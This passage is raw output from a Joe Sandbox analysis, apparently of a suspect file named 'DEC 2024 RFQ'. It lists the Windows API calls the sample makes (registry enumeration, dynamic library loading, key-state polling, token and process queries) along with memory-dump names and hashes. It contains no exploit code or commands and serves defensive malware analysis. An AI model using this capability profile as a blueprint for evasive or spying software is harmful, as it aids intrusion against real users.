                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0009EC07
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0009EC37
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0009ED6A
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009EDEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: 1d61a05fe6e28d8dbc5b1f9bfaba11dd9a87a7e25dfde9eeeb756e95e94166ff
                                                                                                                      • Instruction ID: 7902dd8618ba2678b1f970d9300962845549c69c19ef97224a6a95afb9b717b4
                                                                                                                      • Opcode Fuzzy Hash: 1d61a05fe6e28d8dbc5b1f9bfaba11dd9a87a7e25dfde9eeeb756e95e94166ff
                                                                                                                      • Instruction Fuzzy Hash: A3818271600710AFDB60EF28D886F6AB7E5AF48710F44881DF999DB2D2DB70AC44CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A00FD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A013C
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000A0183
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 000A01AF
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A01BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3440857362-0
                                                                                                                      • Opcode ID: 97de699e22d93c24a56abcf4d2a2603a34f1ef32eb448d54fecc242bbecdb52a
                                                                                                                      • Instruction ID: 32890c1ca6ac7a23cc6900984ebe4ed1dba2c15714907d7141730226597b9d91
                                                                                                                      • Opcode Fuzzy Hash: 97de699e22d93c24a56abcf4d2a2603a34f1ef32eb448d54fecc242bbecdb52a
                                                                                                                      • Instruction Fuzzy Hash: 6C519E71208205AFD714EF94DC91EAEB7E8FF85304F40492DF595872A2DB31E944CB52
APIs
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0009D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0009D9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0009D9C6
• GetProcAddress.KERNEL32(00000000,?), ref: 0009DA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0009DA21
  • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
  • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0008E61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0008E648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0008E687
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0008E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0008E6B4
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCursorPos.USER32(?), ref: 00022357
• ScreenToClient.USER32(000E57B0,?), ref: 00022374
• GetAsyncKeyState.USER32(00000001), ref: 00022399
• GetAsyncKeyState.USER32(00000002), ref: 000223A7
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000763E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 00076433
• TranslateMessage.USER32(?), ref: 0007645C
• DispatchMessageW.USER32(?), ref: 00076466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00076475
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
APIs
• GetWindowRect.USER32(?,?), ref: 00078A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00078ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00078AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00078AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00078AF8
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 0007B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0007B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0007B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0007B27F
• _wcsstr.LIBCMT ref: 0007B289
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
• GetWindowLongW.USER32(?,000000F0), ref: 000AB192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000AB1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000AB1CF
• GetSystemMetrics.USER32(00000004), ref: 000AB1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00090E90,00000000), ref: 000AB216
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
                                                                                                                      • Opcode ID: 3f9f46c8f0d400982d2cba812dbf33cfcca443859eb5d660ddb2dbbf5842c543
                                                                                                                      • Instruction ID: 20954b792be2502f362cc4f38d93ea9578b9813c321ca9776b117dbb6d7f4219
                                                                                                                      • Opcode Fuzzy Hash: 3f9f46c8f0d400982d2cba812dbf33cfcca443859eb5d660ddb2dbbf5842c543
                                                                                                                      • Instruction Fuzzy Hash: 1521B431910651AFDB609FB8DC04B6A37A4FB07721F104B35F932D71E1E73098218B80

APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00079320
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00079352
• __itow.LIBCMT ref: 0007936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00079392
• __itow.LIBCMT ref: 000793A3
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: a71c14b50a556b2e470dcebca253fae1959b525f4a0c87c9b055fb9fba9718d7
• Instruction ID: 1a92698145028bb8f80c90d75fac27a9464b54f98593ceab1ddfce2611cb2f20
• Opcode Fuzzy Hash: a71c14b50a556b2e470dcebca253fae1959b525f4a0c87c9b055fb9fba9718d7
• Instruction Fuzzy Hash: E821F931B01218BBDB119FA49C85EEE7BADEB49710F048029FD0DEB1D1D6B4CE4187A5

APIs
• IsWindow.USER32(00000000), ref: 00095A6E
• GetForegroundWindow.USER32 ref: 00095A85
• GetDC.USER32(00000000), ref: 00095AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 00095ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00095B08
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: c202d7fd7e43058ea9c9ea2d0377650350bb7b6d0e36f3cf57950a32219c5a6c
• Instruction ID: e3a81223531db52f973f6eb1d54c55b4742433fb2fc71a4b8963ca31d84b2d38
• Opcode Fuzzy Hash: c202d7fd7e43058ea9c9ea2d0377650350bb7b6d0e36f3cf57950a32219c5a6c
• Instruction Fuzzy Hash: 60219D35A00604AFDB14EFA5DD88AAABBF5EF49311F148079F849D7362CA34AC40DB90

APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0002134D
• SelectObject.GDI32(?,00000000), ref: 0002135C
• BeginPath.GDI32(?), ref: 00021373
• SelectObject.GDI32(?,00000000), ref: 0002139C
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: ae2195aef545bb747d5a2c896f0abdf476fa5542ba09faf35406d1b9db9a4c60
• Instruction ID: 93ddbd649be225f72a5fb6eeb4b1025ebe229add7cc3d1a37168d1e5ddbfe114
• Opcode Fuzzy Hash: ae2195aef545bb747d5a2c896f0abdf476fa5542ba09faf35406d1b9db9a4c60
• Instruction Fuzzy Hash: 5B21B630800654EFEB10CF55ED847AD3BE9FB14716F244626F814BA1B0DBB89991CF90

APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: c63176f4c6bf11eb7be622220f7a2904ab36585bcce7966750509f126a1b9b76
• Instruction ID: c12fe93914d91c31c845ae914e55dcd1ceece2a46586023ee252ebc1bfd66817
• Opcode Fuzzy Hash: c63176f4c6bf11eb7be622220f7a2904ab36585bcce7966750509f126a1b9b76
• Instruction Fuzzy Hash: 3D01B5B2A001097BD2157A119D42FFFBB5CDF50398F04C021FE0D9A243FB54DE1082A8

APIs
• GetCurrentThreadId.KERNEL32 ref: 00084ABA
• __beginthreadex.LIBCMT ref: 00084AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00084AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00084B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00084B0A
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 36e0140572639bf633e86d5fb24f2db2a7892841a76868974452bd933129a53c
• Instruction ID: 345b492b6d11a664b1bc27fa5a18fdb134710f587d4b3778b12daae7b85af041
• Opcode Fuzzy Hash: 36e0140572639bf633e86d5fb24f2db2a7892841a76868974452bd933129a53c
• Instruction Fuzzy Hash: 1D114872904645BBEB009FA89C44AAB7FACFB46321F144269F914D7250D779C90087A0

APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0007821E
• GetLastError.KERNEL32(?,00077CE2,?,?,?), ref: 00078228
• GetProcessHeap.KERNEL32(00000008,?,?,00077CE2,?,?,?), ref: 00078237
• HeapAlloc.KERNEL32(00000000,?,00077CE2,?,?,?), ref: 0007823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00078255
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 54ba310b12ee571cf47bee2223fca75ff80c382a363b480abe1f4a301b085582
• Instruction ID: 4733d9f85b45c7dc2471d48cf36d3269d81cb98f4e7c1d27d81997a38831ac59
• Opcode Fuzzy Hash: 54ba310b12ee571cf47bee2223fca75ff80c382a363b480abe1f4a301b085582
• Instruction Fuzzy Hash: B1016D71740605BFEB205FA5DC4CD7B7BACEF8A756B508469F809C2220DA358C01CB60

APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?,?,00077455), ref: 00077127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?), ref: 00077160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 0007716C
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 65a774c2f5b73d748ded9521af6d6667e887a544c75149d1aff98699f92ad665
• Instruction ID: af80a22b0c726b885108b8e73776a5c0c4d56643e20ffde04713012b68e88524
• Opcode Fuzzy Hash: 65a774c2f5b73d748ded9521af6d6667e887a544c75149d1aff98699f92ad665
• Instruction Fuzzy Hash: 7A01DF76A00205BBEB104FA8DC44BAA7BECEF45B91F108174FD0CD6220DB39DD008BA0
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00085260
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0008526E
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00085276
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00085280
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 732782ad15e802baeee5077e8caec51dc8393a017bb3633cedc39946c38763bb
                                                                                                                      • Instruction ID: e66f36c05d1e07907bafa904bf3ee30d321a067f4386803c02673752acc17cd6
                                                                                                                      • Opcode Fuzzy Hash: 732782ad15e802baeee5077e8caec51dc8393a017bb3633cedc39946c38763bb
                                                                                                                      • Instruction Fuzzy Hash: C3011731D01A2ADBDF00EFE4EC49AEDBB78FB0E712F400566E981B2140CF3459548BA1
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00078121
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0007812B
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0007813A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00078141
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00078157
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: b37aa4adab19be80352b7f9ac069a5bea023869370b5ae33772d04fb05ccdd35
                                                                                                                      • Instruction ID: 04d10862721d1bbd80d3cc2956b6bee3a59ce38c0fb246adf507a89107e2e1aa
                                                                                                                      • Opcode Fuzzy Hash: b37aa4adab19be80352b7f9ac069a5bea023869370b5ae33772d04fb05ccdd35
                                                                                                                      • Instruction Fuzzy Hash: E0F0AF71340305AFEB511FA4EC8CE773BACEF4A755B404035F949C2150DF689901DB60
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0007C1F7
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0007C20E
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0007C226
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0007C242
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0007C25C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 39c78c1c2a90f826657223341db277bcba12c419526080f1f065b3f2c76baeda
                                                                                                                      • Instruction ID: 0770b543dabef2b72665646ff6838abe2356a3aff3ba0a5330ea136bfca12a01
                                                                                                                      • Opcode Fuzzy Hash: 39c78c1c2a90f826657223341db277bcba12c419526080f1f065b3f2c76baeda
                                                                                                                      • Instruction Fuzzy Hash: 6801A230804705ABFB255BA0ED4EFA677B8BB01B06F00426DA586A14E2DBE869458B94
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 000213BF
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0005B888,00000000,?), ref: 000213DB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000213EE
                                                                                                                      • DeleteObject.GDI32 ref: 00021401
                                                                                                                      • StrokePath.GDI32(?), ref: 0002141C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a450bbd1d529531662bf30da04ec8bdc22242c440a34ed39c7b6ac83f9ee5401
                                                                                                                      • Instruction ID: 12ac2b80d996f90119f9b1eb191346b4fa87d56bc46762b46a9753f3e78fe579
                                                                                                                      • Opcode Fuzzy Hash: a450bbd1d529531662bf30da04ec8bdc22242c440a34ed39c7b6ac83f9ee5401
                                                                                                                      • Instruction Fuzzy Hash: 0AF03130000B49EBEB155F56ED8CBA83FE5AB1172BF088624E4696C0F1CB784595DF10
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 00027A51: _memmove.LIBCMT ref: 00027AAB
                                                                                                                      • __swprintf.LIBCMT ref: 00032ECD
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00032D66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
